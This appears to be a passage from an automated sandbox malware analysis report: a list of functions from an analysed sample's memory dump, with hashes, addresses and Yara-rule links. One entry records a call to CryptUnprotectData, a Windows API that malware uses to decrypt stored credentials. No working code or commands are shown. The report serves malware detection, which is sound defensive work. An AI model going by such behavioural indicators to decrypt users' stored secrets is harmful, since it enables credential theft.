                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                  • Instruction ID: e2204b18fa239e4a8b4bdf36829aa95afe1dea6f295647ffcd10ed4ceafda9e1
                  • Opcode Fuzzy Hash: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                  • Instruction Fuzzy Hash: 6E41D670A40A28AFDB24DB58CC95B9BB7B5BB48702F5041D8E618A7290D771AE85CF60
                  Function 00D39B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                  • LocalFree.KERNEL32(?), ref: 00D39BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: cf61607e9df87026081bf6d17d33fbe887a2e22a5ebecd12a10d6d8944ac410b
                  • Instruction ID: d3448ae6c304cfa10988656883e536a604ac8a64d2c96bd68c0c9beb5ff5513d
                  • Opcode Fuzzy Hash: cf61607e9df87026081bf6d17d33fbe887a2e22a5ebecd12a10d6d8944ac410b
                  • Instruction Fuzzy Hash: CA11CCB8A00209DFDB04DF94D985AAEB7B9FF88300F104558E91597354D774AE51CF62
                  Function 0106C246 Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: gNo$|t{~
                  • API String ID: 0-4251236080
                  • Opcode ID: a4b0b768fd71e8e3cd1d6f70858317f0216c1b9c4a183b1fdc66c233cac07e12
                  • Instruction ID: 15f0724c9f63c35a8872aedeab22099da3e9bd3d590724068b99db3a9102f768
                  • Opcode Fuzzy Hash: a4b0b768fd71e8e3cd1d6f70858317f0216c1b9c4a183b1fdc66c233cac07e12
                  • Instruction Fuzzy Hash: 186107F37081005FE304AA2EDC45B2BBBEBEBD4720F2A893DE5C5C7744E67598068652
                  Function 00FDCAAC Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: pC}$~jky
                  • API String ID: 0-2841546395
                  • Opcode ID: 3a961691c7cbc23a04eb30c8774726dbeb4a8311140a572821725a332f57df53
                  • Instruction ID: 84edd82da8f1f07f06a29e3928e9b5b87c83aecde9ac0456090be3e0b618894c
                  • Opcode Fuzzy Hash: 3a961691c7cbc23a04eb30c8774726dbeb4a8311140a572821725a332f57df53
                  • Instruction Fuzzy Hash: EB310BB3B046044BF3485C7EDD9536BB6969BD4310F1BC13ED98593B84EC7999094382
                  Function 010F15BA Relevance: 1.8, Strings: 1, Instructions: 514COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: E}
                  • API String ID: 0-3764991304
                  • Opcode ID: 2a4e674aa7214856188db6d50203738c4b039a3d2d6a6fb465dd36115f79e3e5
                  • Instruction ID: 8e61cbe4eabd8fb02634251a331bc337125a39fea6add3884f3a65d22f0db331
                  • Opcode Fuzzy Hash: 2a4e674aa7214856188db6d50203738c4b039a3d2d6a6fb465dd36115f79e3e5
                  • Instruction Fuzzy Hash: A5F1E1F39082049FE304AF29EC8567AFBE5EF94720F16493DEAC4C7304E63599558A87
                  Function 010F9967 Relevance: 1.7, Strings: 1, Instructions: 485COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: [Ss;
                  • API String ID: 0-3869967431
                  • Opcode ID: dfe4fb43f8e7cf50f486f1cc687fd8346da1877876cb9afc19fa3b46b8ca8723
                  • Instruction ID: 6e86d2f02927092b2a436daf17bed13b6ce46c6c94c312dbc8f34108023887ab
                  • Opcode Fuzzy Hash: dfe4fb43f8e7cf50f486f1cc687fd8346da1877876cb9afc19fa3b46b8ca8723
                  • Instruction Fuzzy Hash: 8CE108F3A092049FE310AE2DDC8176AFBE9EF94720F1A893DE6C4C3744E53598158697
                  Function 01077390 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: W7zl
                  • API String ID: 0-3345917725
                  • Opcode ID: 0b8f75343fb5494af301678dc68fc83fdea3def72ca80b7c2b7dc8cca639bb20
                  • Instruction ID: 2fffb141b302725911e4a5294a5e760178dac110d33ee7e8ea4cdf23bfb65bfc
                  • Opcode Fuzzy Hash: 0b8f75343fb5494af301678dc68fc83fdea3def72ca80b7c2b7dc8cca639bb20
                  • Instruction Fuzzy Hash: FE61DFB3A08604AFE3096E29DC5577EBBE6EF94320F16493DDAC9C3744DA3448418B86
                  Function 01007347 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: }!?}
                  • API String ID: 0-4160007223
                  • Opcode ID: 13364f950de8d96b84168b6684edb2f30e9b6b69ad9c401904ef3cb409a8b25c
                  • Instruction ID: 748ac8f9e1862c1d2699fa6276367f912de3a461719b68cdb5d1273d2dc8c22c
                  • Opcode Fuzzy Hash: 13364f950de8d96b84168b6684edb2f30e9b6b69ad9c401904ef3cb409a8b25c
                  • Instruction Fuzzy Hash: D461F7F3A0C6009FE308AA29DC4577EB7E6EFD4710F16892CD6C883784EA3848458756
                  Function 010D2033 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Q-n
                  • API String ID: 0-4097762733
                  • Opcode ID: 470e4b697add6a482b73d6790ee9fdeb43b21bd0fd5072b08ccf77d71f2bde59
                  • Instruction ID: ba98064314f5980fd765d4af623c2313bc3b613f7629fe483cc55993d646779a
                  • Opcode Fuzzy Hash: 470e4b697add6a482b73d6790ee9fdeb43b21bd0fd5072b08ccf77d71f2bde59
                  • Instruction Fuzzy Hash: 0C51E8F39086108BE310BE2CDC8536ABBE5EF94320F1A463DDEC4D7744E579985586C6
                  Function 00FF86B9 Relevance: .2, Instructions: 203COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cbf8cd4c4a9e283cbf3b956f11b9dd969b5cb0f0101107a1e0d381d0132d8575
                  • Instruction ID: 8ea22ce9aa8c4d4abb5536bbe1415e398e80fd928092859e7a74d002e427228e
                  • Opcode Fuzzy Hash: cbf8cd4c4a9e283cbf3b956f11b9dd969b5cb0f0101107a1e0d381d0132d8575
                  • Instruction Fuzzy Hash: C15108F3A082149BF3186A29DC557BBBBD6EBE4720F1A453DD7C9837C0D93A48058786
                  Function 0116C797 Relevance: .1, Instructions: 144COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e87e4ef9d7f6da88154a877a7e4fd87d0dd8b6b3d16d32964dce806ea866539b
                  • Instruction ID: a79c547e23b32b3841f1840b0a4b14ab206cd5e9555e121ce6a73cb84cb4ef53
                  • Opcode Fuzzy Hash: e87e4ef9d7f6da88154a877a7e4fd87d0dd8b6b3d16d32964dce806ea866539b
                  • Instruction Fuzzy Hash: F541F9B360C6009FE748AE39EC84A7ABBE6EBD4310F16C53DE6C487758EA3548458646
                  Function 01078039 Relevance: .1, Instructions: 123COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48d344ba7a73f933a09a055be8fd2b013be35b3606b1232e67b7fe1e01d4324c
                  • Instruction ID: b634bfcf0d82606117bf4df815cd637fbf85edd0838556b4dc1338593e153371
                  • Opcode Fuzzy Hash: 48d344ba7a73f933a09a055be8fd2b013be35b3606b1232e67b7fe1e01d4324c
                  • Instruction Fuzzy Hash: 623110F7F142101BF304A969DC857BAB296EBD4321F2B843DDB88A7780E9798C018681
                  Function 00D49750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
